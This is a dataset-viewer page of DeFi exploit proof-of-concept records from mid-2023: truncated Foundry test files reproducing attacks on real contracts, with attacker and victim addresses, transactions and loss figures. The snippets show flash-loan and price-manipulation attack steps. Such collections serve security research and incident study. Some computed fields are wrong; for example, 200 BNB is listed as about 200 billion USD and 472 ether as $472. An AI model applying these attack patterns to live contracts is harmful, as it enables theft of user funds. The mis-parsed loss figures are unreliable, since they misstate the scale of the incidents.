Dataset Viewer
Auto-converted to Parquet Duplicate
source_code
stringlengths
878
31.2k
type
stringclasses
1 value
protocol
stringlengths
2
33
date
stringclasses
70 values
file_name
stringlengths
10
41
attack_vector
stringclasses
4 values
content_hash
stringlengths
16
16
collected_at
stringdate
2026-01-07 10:59:16
2026-01-07 10:59:16
_source
stringclasses
1 value
chain
stringclasses
8 values
block_number
int64
1.11M
356M
total_lost_raw
stringlengths
3
127
total_lost_usd
float64
0
19,026B
attacker_address
stringlengths
65
82
attack_contract
stringlengths
70
89
vulnerable_contract
stringlengths
68
82
attack_tx
stringlengths
89
115
postmortem_url
stringclasses
85 values
twitter_url
stringlengths
48
62
has_keyinfo
bool
2 classes
has_analysis
bool
2 classes
has_attack_vector
bool
2 classes
severity
stringclasses
4 values
severity_raw
stringlengths
3
127
category
stringclasses
5 values
exploit_code
stringlengths
0
25.5k
has_exploit_code
bool
2 classes
keyinfo_total_lost
stringlengths
0
127
keyinfo_attacker
stringlengths
0
82
keyinfo_attack_contract
stringlengths
0
89
keyinfo_vulnerable_contract
stringlengths
0
82
keyinfo_attack_tx
stringlengths
0
115
analysis_postmortem
stringclasses
82 values
analysis_twitter
stringlengths
0
62
funds_lost_formatted
stringlengths
2
13
content_richness_score
float64
0.63
10
quality_estimate
stringclasses
3 values
title
stringlengths
20
51
has_total_lost
bool
2 classes
has_vulnerable_contract
bool
2 classes
has_attack_tx
bool
2 classes
has_postmortem
bool
2 classes
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 4.7K USD // Attacker : https://etherscan.io/address/0x43debe92a7a32dca999593fad617dbd2e6b080a5s // Attack Contract : https://etherscan.io/address/0x5b5a0580bcfd3673820bb249514234afad33e209 // Vulnerable Contrac...
exploit_poc
IUNMI_db27
null
IUNMI_db27_exp.sol
null
8605de1e0fdfc835
2026-01-07T10:59:16.509448
postmortems
ethereum
20,729,672
4.7K USD
4,700
https://etherscan.io/address/0x43debe92a7a32dca999593fad617dbd2e6b080a5s
https://etherscan.io/address/0x5b5a0580bcfd3673820bb249514234afad33e209
https://etherscan.io/address/0xdb27d4ff4be1cd04c34a7cb6f47402c37cb73459
https://etherscan.io/tx/0x45ce017f5a295f387eafb596b4bcb1192dd1c302ccb9d097d7fa2cdf3008b139
https://x.com/TenArmorAlert/status/1834503422655263099
https://x.com/TenArmorAlert/status/1834503422655263099
true
true
false
low
4.7K USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); deal(address(attC), 2.0000000000001075 ether); attC.attack{value: 1.07297e-13 ether}(...
true
4.7K USD
https://etherscan.io/address/0x43debe92a7a32dca999593fad617dbd2e6b080a5s
https://etherscan.io/address/0x5b5a0580bcfd3673820bb249514234afad33e209
https://etherscan.io/address/0xdb27d4ff4be1cd04c34a7cb6f47402c37cb73459
https://etherscan.io/tx/0x45ce017f5a295f387eafb596b4bcb1192dd1c302ccb9d097d7fa2cdf3008b139
https://x.com/TenArmorAlert/status/1834503422655263099
https://x.com/TenArmorAlert/status/1834503422655263099
$4.7K
7.82
medium
IUNMI_db27 Exploit (None)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : Unclear // Attacker : https://bscscan.com/address/0x97eace4702217c1fea71cf6b79647a8ad5ddb0eb // Attack Contract : https://bscscan.com/address/0xb8f83f38e262f28f4e7d80aa5...
exploit_poc
GYMNET
2023-07
GYMNET_exp.sol
flash_loan
beb66d4fa1a8e1f9
2026-01-07T10:59:16.509619
postmortems
bsc
30,448,986
Unclear
null
https://bscscan.com/address/0x97eace4702217c1fea71cf6b79647a8ad5ddb0eb
https://bscscan.com/address/0xb8f83f38e262f28f4e7d80aa5a0216378e92baf2
https://bscscan.com/address/0x6b869795937dd2b6f4e03d5a0ffd07a8ad8c095b
https://bscscan.com/tx/0x7fe96c00880b329aa0fcb00f0ef3a0766c54e13965becf9cc5e0df6fbd0deca6
null
null
true
true
true
medium
Unclear
flash-loan
function testExploit() public { // Attacker deploys fakeUSDT contract,forcing victim's gym to exchange fakeUSDT to earn // Start with below amount of fakeUSDT. Crucial for further adding liquidity to PancakeRouter // Attack contract already had fakeUSDT balance in attack tx deal(address(...
true
Unclear
https://bscscan.com/address/0x97eace4702217c1fea71cf6b79647a8ad5ddb0eb
https://bscscan.com/address/0xb8f83f38e262f28f4e7d80aa5a0216378e92baf2
https://bscscan.com/address/0x6b869795937dd2b6f4e03d5a0ffd07a8ad8c095b
https://bscscan.com/tx/0x7fe96c00880b329aa0fcb00f0ef3a0766c54e13965becf9cc5e0df6fbd0deca6
Unknown
9
high
GYMNET Exploit (2023-07)
false
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~16k // Attacker contract address : https://bscscan.com/address/0x21ad028c185ac004474c21ec5666189885f9e518 // Vulnerable contract : https://bscscan.com/address/0x637de69...
exploit_poc
LUSD
2023-07
LUSD_exp.sol
flash_loan
6b09e832cdfce40f
2026-01-07T10:59:16.509719
postmortems
bsc
29,756,866
~16k
16,000
null
null
https://bscscan.com/address/0x637de69f45f3b66d5389f305088a38109aa0cf7c#code
https://explorer.phalcon.xyz/tx/bsc/0x1eeef7b9a12b13f82ba04a7951c163eb566aa048050d6e9318b725d7bcec6bfa
null
null
true
true
true
medium
~16k
flash-loan
function testSkim() public { deal(address(BEP20USDT), address(this), 0); emit log_named_decimal_uint( "Attacker BEP20USDT balance before attack", BEP20USDT.balanceOf(address(this)), BEP20USDT.decimals() ); takeFlashloan(DPPOracle1); emit log_named_decimal_uint( ...
true
~16k
$16.0K
9.31
high
LUSD Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~472 Ether (~$888K) // Attacker : https://arbiscan.io/address/0x2f3788f2396127061c46fc07bd0fcb91faace328 // Attack Contract : https://arbiscan.io/address/0xe9544ee39821f...
exploit_poc
RodeoFinance
2023-07
RodeoFinance_exp.sol
flash_loan
94559dbb1edcd429
2026-01-07T10:59:16.509803
postmortems
arbitrum
110,043,452
~472 Ether (~$888K)
472
https://arbiscan.io/address/0x2f3788f2396127061c46fc07bd0fcb91faace328
https://arbiscan.io/address/0xe9544ee39821f72c4fc87a5588522230e340aa54
https://arbiscan.io/address/0xf3721d8a2c051643e06bf2646762522fa66100da
https://arbiscan.io/tx/0xb1be5dee3852c818af742f5dd44def285b497ffc5c2eda0d893af542a09fb25a
null
null
true
true
true
low
~472 Ether (~$888K)
flash-loan
function testExploit() public { // Begin with the specific amount of unsETH (info about amount taken from the above attack tx) // the attackers manipulated the price of TWAP Oracle through multiple transactions // such as https://arbiscan.io/tx/0x5f16637460021994d40430dadc020fffdb96937cfaf2b8cb6...
true
~472 Ether (~$888K)
https://arbiscan.io/address/0x2f3788f2396127061c46fc07bd0fcb91faace328
https://arbiscan.io/address/0xe9544ee39821f72c4fc87a5588522230e340aa54
https://arbiscan.io/address/0xf3721d8a2c051643e06bf2646762522fa66100da
https://arbiscan.io/tx/0xb1be5dee3852c818af742f5dd44def285b497ffc5c2eda0d893af542a09fb25a
$472
10
high
RodeoFinance Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$119K // Attacker : https://bscscan.com/address/0xe84ef3615b8df94c52e5b6ef21acbf0039b29113 // Attacker Contract : https://bscscan.com/address/0x6191203510c2a6442faecdb6...
exploit_poc
Utopia
2023-07
Utopia_exp.sol
null
c2aec66884e956a7
2026-01-07T10:59:16.509879
postmortems
bsc
30,119,396
~$119K
119,000
https://bscscan.com/address/0xe84ef3615b8df94c52e5b6ef21acbf0039b29113
null
https://bscscan.com/address/0xb1da08c472567eb0ec19639b1822f578d39f3333
https://bscscan.com/tx/0xeb4eb487f58d39c05778fed30cd001b986d3c52279e44f46b2de2773e7ee1d5e
null
null
true
true
false
high
~$119K
unknown
function testExploit() public { deal(address(WBNB), address(this), 0.01 ether); WBNB.approve(address(Router), type(uint256).max); Utopia.approve(address(Router), type(uint256).max); emit log_named_decimal_uint( "Attacker WBNB balance before exploit", WBNB.balanceOf(address(th...
true
~$119K
https://bscscan.com/address/0xe84ef3615b8df94c52e5b6ef21acbf0039b29113
https://bscscan.com/address/0xb1da08c472567eb0ec19639b1822f578d39f3333
https://bscscan.com/tx/0xeb4eb487f58d39c05778fed30cd001b986d3c52279e44f46b2de2773e7ee1d5e
$119.0K
7.74
medium
Utopia Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~200BNB // Attacker : 0x00703face6621bd207d3b4ac9867058190c0bb09 // Attack Contract : 0xcdf0eb202cfd1f502f3fdca9006a4b5729aadebc // Vulnerable Contract : 0xed56784bc8f2c...
exploit_poc
Bamboo
2023-07
Bamboo_exp.sol
flash_loan
610a4f51346aae04
2026-01-07T10:59:16.509930
postmortems
bsc
29,668,034
~200BNB
200,000,000,000
null
null
null
https://explorer.phalcon.xyz/tx/bsc/0x88a6c2c3ce86d4e0b1356861b749175884293f4302dbfdbfb16a5e373ab58a10
https://twitter.com/Phalcon_xyz/status/1676220090142916611
null
true
true
true
critical
~200BNB
flash-loan
function testExploit() public { // get a flash loan (lets mock it out) deal(address(wbnb), address(this), 4000 ether); console.log("start balance after flashloan", toEth(wbnb.balanceOf(address(this)))); uint256 bambooBalance = bamboo.balanceOf(address(wbnbBambooPair)); address...
true
~200BNB
https://explorer.phalcon.xyz/tx/bsc/0x88a6c2c3ce86d4e0b1356861b749175884293f4302dbfdbfb16a5e373ab58a10
https://twitter.com/Phalcon_xyz/status/1676220090142916611
$200000.00M
7.55
medium
Bamboo Exploit (2023-07)
true
false
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~80K USD$ // Attacker : https://bscscan.com/address/0xdc459596aed13b9a52fb31e20176a7d430be8b94 // Attack Contract : https://bscscan.com/address/0x5336a15f27b74f62cc18238...
exploit_poc
WGPT
2023-07
WGPT_exp.sol
flash_loan
6592172eefcd4ebe
2026-01-07T10:59:16.509982
postmortems
bsc
29,891,709
~80K USD$
80,000
https://bscscan.com/address/0xdc459596aed13b9a52fb31e20176a7d430be8b94
https://bscscan.com/address/0x5336a15f27b74f62cc182388c005df419ffb58b8
https://bscscan.com/address/0x1f415255f7e2a8546559a553e962de7bc60d7942
https://bscscan.com/tx/0x258e53526e5a48feb1e4beadbf7ee53e07e816681ea297332533371032446bfd
null
null
true
true
true
medium
~80K USD$
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); emit log_named_decimal_uint("Attacker BUSDT balance before", BUSDT.balanceOf(address(this)), BUSDT.decimals()); ExpToken.approve(address(Router), type(uint256).max); BUSDT.approve(address(Router), type(uint256).max);...
true
~80K USD$
https://bscscan.com/address/0xdc459596aed13b9a52fb31e20176a7d430be8b94
https://bscscan.com/address/0x5336a15f27b74f62cc182388c005df419ffb58b8
https://bscscan.com/address/0x1f415255f7e2a8546559a553e962de7bc60d7942
https://bscscan.com/tx/0x258e53526e5a48feb1e4beadbf7ee53e07e816681ea297332533371032446bfd
$80.0K
10
high
WGPT Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$900K // Attacker : https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366 // Attack Contract : https://bscscan.com/address/0x55252a6d50bfad0e5f10095412...
exploit_poc
Palmswap
2023-07
Palmswap_exp.sol
flash_loan
c57eea31f152889d
2026-01-07T10:59:16.510051
postmortems
bsc
30,248,637
~$900K
900,000
https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366
https://bscscan.com/address/0x55252a6d50bfad0e5f1009541284c783686f7f25
https://bscscan.com/address/0xd990094a611c3de34664dd3664ebf979a1230fc1
https://bscscan.com/tx/0x62dba55054fa628845fecded658ff5b1ec1c5823f1a5e0118601aa455a30eac9
null
null
true
true
true
high
~$900K
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); BUSDT.approve(plpManager, type(uint256).max); BUSDT.approve(address(RadiantLP), type(uint256).max); PLP.approve(fPLP, type(uint256).max); emit log_named_decimal_uint( "Attacker balance of BUSDT b...
true
~$900K
https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366
https://bscscan.com/address/0x55252a6d50bfad0e5f1009541284c783686f7f25
https://bscscan.com/address/0xd990094a611c3de34664dd3664ebf979a1230fc1
https://bscscan.com/tx/0x62dba55054fa628845fecded658ff5b1ec1c5823f1a5e0118601aa455a30eac9
$900.0K
9.07
high
Palmswap Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~7K USD$ // Attacker : https://bscscan.com/address/0x10703f7114dce7beaf8d23cde4bf72130bb0f56a // Attack Contract : https://bscscan.com/address/0x45aa258ad08eeeb841c1c02e...
exploit_poc
ApeDAO
2023-07
ApeDAO_exp.sol
flash_loan
7d850e97dd75e65e
2026-01-07T10:59:16.510104
postmortems
bsc
30,072,293
~7K USD$
7,000
https://bscscan.com/address/0x10703f7114dce7beaf8d23cde4bf72130bb0f56a
https://bscscan.com/address/0x45aa258ad08eeeb841c1c02eca7658f9dd4779c0
https://bscscan.com/address/0xb47955b5b7eaf49c815ebc389850eb576c460092
https://bscscan.com/tx/0x8d35dfd9968ce61fb969ffe8dcc29eeeae864e466d2cb0b7d26ce63644691994
null
null
true
true
true
low
~7K USD$
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); emit log_named_decimal_uint( "BUSDT balance of attacker before exploit", BUSDT.balanceOf(address(this)), BUSDT.decimals() ); DPPOracle1.flashLoan(0, BUSDT.balanceOf(address(DPPOracle1)), address(this), ne...
true
~7K USD$
https://bscscan.com/address/0x10703f7114dce7beaf8d23cde4bf72130bb0f56a
https://bscscan.com/address/0x45aa258ad08eeeb841c1c02eca7658f9dd4779c0
https://bscscan.com/address/0xb47955b5b7eaf49c815ebc389850eb576c460092
https://bscscan.com/tx/0x8d35dfd9968ce61fb969ffe8dcc29eeeae864e466d2cb0b7d26ce63644691994
$7.0K
9.36
high
ApeDAO Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~31K USD$ // Attacker : https://bscscan.com/address/0x3a10408fd7a2b2a43bd14a17c0d4568430b93132 // Attack Contract : https://bscscan.com/address/0x18703a4fd7b3688607abf25...
exploit_poc
NewFi
2023-07
NewFi_exp.sol
null
ec8fa568b960bcc6
2026-01-07T10:59:16.510166
postmortems
bsc
30,043,573
~31K USD$
31,000
https://bscscan.com/address/0x3a10408fd7a2b2a43bd14a17c0d4568430b93132
https://bscscan.com/address/0x18703a4fd7b3688607abf25424b6ab304def2512
https://bscscan.com/address/0xb8dc09eec82cab2e86c7edc8dd5882dd92d22411
https://bscscan.com/tx/0x557628123d137ea49564e4dccff5f5d1e508607e96dd20fe99a670519b679cb5
null
https://twitter.com/Phalcon_xyz/status/1680961588323557376
true
true
false
medium
~31K USD$
unknown
function testExploit() public { USDT.approve(address(Router), type(uint256).max); BUSD.approve(address(Router), type(uint256).max); BUSD.approve(address(StakedV3), type(uint256).max); BUSD.approve(address(StakedV3), type(uint256).max); Pair1.flash(address(this), 0, BUSD.balanceOf...
true
~31K USD$
https://bscscan.com/address/0x3a10408fd7a2b2a43bd14a17c0d4568430b93132
https://bscscan.com/address/0x18703a4fd7b3688607abf25424b6ab304def2512
https://bscscan.com/address/0xb8dc09eec82cab2e86c7edc8dd5882dd92d22411
https://bscscan.com/tx/0x557628123d137ea49564e4dccff5f5d1e508607e96dd20fe99a670519b679cb5
https://twitter.com/Phalcon_xyz/status/1680961588323557376
$31.0K
8.21
high
NewFi Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~452K USD$ // Attacker : https://polygonscan.com/address/0xfd2d3ffb05ad00e61e3c8d8701cb9036b7a16d02 // Attack Contract : https://polygonscan.com/address/0xdfcdb5a86b167b...
exploit_poc
Libertify
2023-07
Libertify_exp.sol
flash_loan
99ea34252bb6530b
2026-01-07T10:59:16.510217
postmortems
polygon
44,941,584
~452K USD$
452,000
https://polygonscan.com/address/0xfd2d3ffb05ad00e61e3c8d8701cb9036b7a16d02
https://polygonscan.com/address/0xdfcdb5a86b167b3a418f3909d6f7a2f2873f2969
https://polygonscan.com/address/0x9c80a455ecaca7025a45f5fa3b85fd6a462a447b
https://polygonscan.com/tx/0x7320accea0ef1d7abca8100c82223533b624c82d3e8d445954731495d4388483
null
https://twitter.com/peckshield/status/1678688731908411393
true
true
true
high
~452K USD$
flash-loan
false
~452K USD$
https://polygonscan.com/address/0xfd2d3ffb05ad00e61e3c8d8701cb9036b7a16d02
https://polygonscan.com/address/0xdfcdb5a86b167b3a418f3909d6f7a2f2873f2969
https://polygonscan.com/address/0x9c80a455ecaca7025a45f5fa3b85fd6a462a447b
https://polygonscan.com/tx/0x7320accea0ef1d7abca8100c82223533b624c82d3e8d445954731495d4388483
https://twitter.com/peckshield/status/1678688731908411393
$452.0K
8
high
Libertify Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~180K USD$ // Attacker : https://etherscan.io/address/0xbf9df575670c739d9bf1424d4913e7244ed3ff66 // Attack Contract : https://etherscan.io/address/0x1ae3929e1975043e5443...
exploit_poc
CIVNFT
2023-07
CIVNFT_exp.sol
access_control
f3690bbe87db29b1
2026-01-07T10:59:16.510285
postmortems
ethereum
17,649,875
~180K USD$
180,000
https://etherscan.io/address/0xbf9df575670c739d9bf1424d4913e7244ed3ff66
https://etherscan.io/address/0x1ae3929e1975043e5443868be91cac12d8cc25ec
https://etherscan.io/address/0xf169bd68ed72b2fdc3c9234833197171aa000580
https://etherscan.io/tx/0x93a033917fcdbd5fe8ae24e9fe22f002949cba2f621a1c43a54f6519479caceb
null
null
true
true
true
high
~180K USD$
access-control
function testExploit() public { emit log_named_decimal_uint("Attacker CIV balance before exploit", CIV.balanceOf(address(this)), CIV.decimals()); // Calling vulnerable function in CIVNFT contract call0x7ca06d68(); emit log_named_decimal_uint("Attacker CIV balance after exploit", CIV.bala...
true
~180K USD$
https://etherscan.io/address/0xbf9df575670c739d9bf1424d4913e7244ed3ff66
https://etherscan.io/address/0x1ae3929e1975043e5443868be91cac12d8cc25ec
https://etherscan.io/address/0xf169bd68ed72b2fdc3c9234833197171aa000580
https://etherscan.io/tx/0x93a033917fcdbd5fe8ae24e9fe22f002949cba2f621a1c43a54f6519479caceb
$180.0K
9.18
high
CIVNFT Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~150K USD$ // Attacker : https://bscscan.com/address/0x25bcbbb92c2ae9d0c6f4db814e46fd5c632e2bd3 // Attack Contract : https://bscscan.com/address/0x9cffc95e742d22c1446a3d...
exploit_poc
Carson
2023-07
Carson_exp.sol
flash_loan
fdcc073149a72ae5
2026-01-07T10:59:16.510336
postmortems
bsc
30,306,324
~150K USD$
150,000
https://bscscan.com/address/0x25bcbbb92c2ae9d0c6f4db814e46fd5c632e2bd3
https://bscscan.com/address/0x9cffc95e742d22c1446a3d22e656bb23835a38ac
null
https://bscscan.com/tx/0x37d921a6bb0ecdd8f1ec918d795f9c354727a3ff6b0dba98a512fceb9662a3ac
null
null
true
true
true
high
~150K USD$
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); emit log_named_decimal_uint( "Attacker balance of BUSDT before exploit", BUSDT.balanceOf(address(this)), BUSDT.decimals() ); DPPOracle1.flashLoan(0, BUSDT.balanceOf(address(DPPOracle1)), address(this), n...
true
~150K USD$
https://bscscan.com/address/0x25bcbbb92c2ae9d0c6f4db814e46fd5c632e2bd3
https://bscscan.com/address/0x9cffc95e742d22c1446a3d22e656bb23835a38ac
https://bscscan.com/tx/0x37d921a6bb0ecdd8f1ec918d795f9c354727a3ff6b0dba98a512fceb9662a3ac
$150.0K
8.22
high
Carson Exploit (2023-07)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$505K // Attacker : https://bscscan.com/address/0xa6566574edc60d7b2adbacedb71d5142cf2677fb // Attacker Contract : https://bscscan.com/address/0xd138b9a58d3e5f4be1cd5ec9...
exploit_poc
BNO
2023-07
BNO_exp.sol
null
6a28a8ad3c7d2ee2
2026-01-07T10:59:16.510392
postmortems
bsc
30,056,629
~$505K
505,000
https://bscscan.com/address/0xa6566574edc60d7b2adbacedb71d5142cf2677fb
null
https://bscscan.com/address/0xdca503449899d5649d32175a255a8835a03e4006
https://bscscan.com/tx/0x33fed54de490797b99b2fc7a159e43af57e9e6bdefc2c2d052dc814cfe0096b9
null
null
true
true
false
high
~$505K
unknown
function testExploit() public { cheats.startPrank(attackerContract); NFT.transferFrom(attacker, address(this), 13); NFT.transferFrom(attacker, address(this), 14); cheats.stopPrank(); emit log_named_decimal_uint( "Attacker balance of BNO before exploit", BNO.balanceOf...
true
~$505K
https://bscscan.com/address/0xa6566574edc60d7b2adbacedb71d5142cf2677fb
https://bscscan.com/address/0xdca503449899d5649d32175a255a8835a03e4006
https://bscscan.com/tx/0x33fed54de490797b99b2fc7a159e43af57e9e6bdefc2c2d052dc814cfe0096b9
$505.0K
7.78
medium
BNO Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~46K USD$ // Attacker : https://etherscan.io/address/0x00693a01221a5e93fb872637e3a9391ef5f48300 // Attack Contract : https://etherscan.io/address/0x3f99d5cd830203a3027eb...
exploit_poc
Bao
2023-07
Bao_exp.sol
flash_loan
f7ae6f8a8d8e8afe
2026-01-07T10:59:16.510441
postmortems
ethereum
17,620,870
~46K USD$
46,000
https://etherscan.io/address/0x00693a01221a5e93fb872637e3a9391ef5f48300
https://etherscan.io/address/0x3f99d5cd830203a3027eb0ed6548db7f81c3408f
https://etherscan.io/address/0xb0f8fe96b4880adbdede0ddf446bd1e7ef122c4e
https://etherscan.io/tx/0xdd7dd68cd879d07cfc2cb74606baa2a5bf18df0e3bda9f6b43f904f4f7bbdfc1
null
https://twitter.com/PeckShieldAlert/status/1676224397248454657
true
true
true
medium
~46K USD$
flash-loan
false
~46K USD$
https://etherscan.io/address/0x00693a01221a5e93fb872637e3a9391ef5f48300
https://etherscan.io/address/0x3f99d5cd830203a3027eb0ed6548db7f81c3408f
https://etherscan.io/address/0xb0f8fe96b4880adbdede0ddf446bd1e7ef122c4e
https://etherscan.io/tx/0xdd7dd68cd879d07cfc2cb74606baa2a5bf18df0e3bda9f6b43f904f4f7bbdfc1
https://twitter.com/PeckShieldAlert/status/1676224397248454657
$46.0K
8
high
Bao Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~20999 USD // TX : https://app.blocksec.com/explorer/tx/eth/0xfc872bf5ca8f04b18b82041ec563e4abf2e31e1fc27d1ea5dee39bc8a79d2d06 // Attacker : https://etherscan.io/addres...
exploit_poc
USDTStakingContract28
2023-07
USDTStakingContract28_exp.sol
null
cee37b2283e5c9c2
2026-01-07T10:59:16.510506
postmortems
ethereum
17,696,562
~20999 USD
20,999
https://etherscan.io/address/0x000000915f1b10b0ef5c4efe696ab65f13f36e74
https://etherscan.io/address/0xb754ebdba9b009113b4cf445a7cb0fc9227648ad
null
null
null
null
true
false
false
medium
~20999 USD
unknown
function testExploit() public { emit log_named_decimal_uint("[Begin] Attacker USDT balance before exploit", USDT.balanceOf(address(this)), 6); money = new Money(); money.attack(); emit log_named_decimal_uint( "[End] Attacker USDT balance after exploit", USDT.balanceOf(address...
true
https://etherscan.io/address/0x000000915f1b10b0ef5c4efe696ab65f13f36e74
https://etherscan.io/address/0xb754ebdba9b009113b4cf445a7cb0fc9227648ad
$21.0K
5.21
medium
USDTStakingContract28 Exploit (2023-07)
true
false
false
false
// SPDX-License-Identifier: MIT pragma solidity ^0.8.9; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~9k US$ // Attacker : https://bscscan.com/address/0xc5001f60db92afcc23177a6c6b440a4226cb58bf // Attack Contract : https://bscscan.com/address/0xba91db0b31d60c45e0b03e6d515e45fc...
exploit_poc
MintoFinance
2023-07
MintoFinance_exp.sol
null
db7c99bae2f44ab3
2026-01-07T10:59:16.510556
postmortems
bsc
30,214,253
~9k US$
9,000
https://bscscan.com/address/0xc5001f60db92afcc23177a6c6b440a4226cb58bf
https://bscscan.com/address/0xba91db0b31d60c45e0b03e6d515e45fcabc7b1cd
https://bscscan.com/address/0xdbf1c56b2ad121fe705f9b68225378aa6784f3e5
https://explorer.phalcon.xyz/tx/bsc/0x53be95dc8ffbc80060215133f76f48df35deef3cd7e1803e24b1e2f8aa53440b
null
https://twitter.com/bbbb/status/1683180340548890631?s=20
true
true
false
low
~9k US$
unknown
false
~9k US$
https://bscscan.com/address/0xc5001f60db92afcc23177a6c6b440a4226cb58bf
https://bscscan.com/address/0xba91db0b31d60c45e0b03e6d515e45fcabc7b1cd
https://bscscan.com/address/0xdbf1c56b2ad121fe705f9b68225378aa6784f3e5
https://explorer.phalcon.xyz/tx/bsc/0x53be95dc8ffbc80060215133f76f48df35deef3cd7e1803e24b1e2f8aa53440b
https://twitter.com/bbbb/status/1683180340548890631?s=20
$9.0K
6.01
medium
MintoFinance Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~934K USD$ // Attacker : https://etherscan.io/address/0xb6369f59fc24117b16742c9dfe064894d03b3b80 // Attack Contract : https://etherscan.io/address/0x486cb3f61771ed548369...
exploit_poc
Conic02
2023-07
Conic02_exp.sol
flash_loan
cabff016f1959a77
2026-01-07T10:59:16.510608
postmortems
ethereum
17,743,470
~934K USD$
934,000
https://etherscan.io/address/0xb6369f59fc24117b16742c9dfe064894d03b3b80
https://etherscan.io/address/0x486cb3f61771ed5483691dd65f4186da9e37c68e
https://etherscan.io/address/0x369cbc5c6f139b1132d3b91b87241b37fc5b971f
https://etherscan.io/tx/0x37acd17a80a5f95728459bfea85cb2e1f64b4c75cf4a4c8dcb61964e26860882
https://medium.com/@ConicFinance/post-mortem-eth-and-crvusd-omnipool-exploits-c9c7fa213a3d
https://twitter.com/spreekaway/status/1682467603518726144
true
true
true
high
~934K USD$
flash-loan
false
~934K USD$
https://etherscan.io/address/0xb6369f59fc24117b16742c9dfe064894d03b3b80
https://etherscan.io/address/0x486cb3f61771ed5483691dd65f4186da9e37c68e
https://etherscan.io/address/0x369cbc5c6f139b1132d3b91b87241b37fc5b971f
https://etherscan.io/tx/0x37acd17a80a5f95728459bfea85cb2e1f64b4c75cf4a4c8dcb61964e26860882
https://medium.com/@ConicFinance/post-mortem-eth-and-crvusd-omnipool-exploits-c9c7fa213a3d
https://twitter.com/spreekaway/status/1682467603518726144
$934.0K
8
high
Conic02 Exploit (2023-07)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~3.25M USD$ // Attacker : https://etherscan.io/address/0x8d67db0b205e32a5dd96145f022fa18aae7dc8aa // Attack Contract : https://etherscan.io/address/0x743599ba5cfa3ce8c59...
exploit_poc
Conic
2023-07
Conic_exp.sol
flash_loan
8c6190ff8008f2fe
2026-01-07T10:59:16.510670
postmortems
ethereum
17,740,954
~3.25M USD$
3,250,000
https://etherscan.io/address/0x8d67db0b205e32a5dd96145f022fa18aae7dc8aa
https://etherscan.io/address/0x743599ba5cfa3ce8c59691af5ef279aaafa2e4eb
https://etherscan.io/address/0xbb787d6243a8d450659e09ea6fd82f1c859691e9
https://etherscan.io/tx/0x8b74995d1d61d3d7547575649136b8765acb22882960f0636941c44ec7bbe146
https://medium.com/@ConicFinance/post-mortem-eth-and-crvusd-omnipool-exploits-c9c7fa213a3d
https://twitter.com/BlockSecTeam/status/1682356244299010049
true
true
true
critical
~3.25M USD$
flash-loan
false
~3.25M USD$
https://etherscan.io/address/0x8d67db0b205e32a5dd96145f022fa18aae7dc8aa
https://etherscan.io/address/0x743599ba5cfa3ce8c59691af5ef279aaafa2e4eb
https://etherscan.io/address/0xbb787d6243a8d450659e09ea6fd82f1c859691e9
